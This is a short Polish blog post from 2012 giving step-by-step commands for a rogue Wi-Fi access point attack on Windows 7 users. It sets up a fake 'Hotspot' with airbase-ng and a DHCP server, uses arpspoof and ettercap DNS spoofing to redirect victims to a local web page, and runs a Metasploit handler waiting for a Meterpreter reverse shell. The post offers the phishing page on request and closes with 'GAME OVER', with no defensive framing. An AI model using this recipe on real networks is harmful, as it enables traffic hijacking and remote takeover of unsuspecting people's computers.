niedziela, 25 marca 2012

fake ap windows 7 exploit
Komendy:
apt-get install dhcp3-server -y
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
kwrite /etc/dhcp3/dhcpd.conf

ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; subnet 192.168.2.128 netmask 255.255.255.128 { option subnet-mask 255.255.255.128; option broadcast-address 192.168.2.255; option routers 192.168.2.129; option domain-name-servers 8.8.8.8; range 192.168.2.130 192.168.2.140; }

airmon-ng start wlan1
airbase-ng -e "Hotspot" -c 9 mon0
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
/etc/init.d/apache2 start
ifconfig (opcjonalnie)
kwrite /usr/share/ettercap/etter.dns
arpspoof -i at0 192.168.2.129
ettercap -T -q -i at0 -P dns_spoof -M arp // //
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.131
set LPORT 4444
exploit
jak ktos by chcial index.php i ikonke pw na forum :D
GAME OVER

Brak komentarzy:

Prześlij komentarz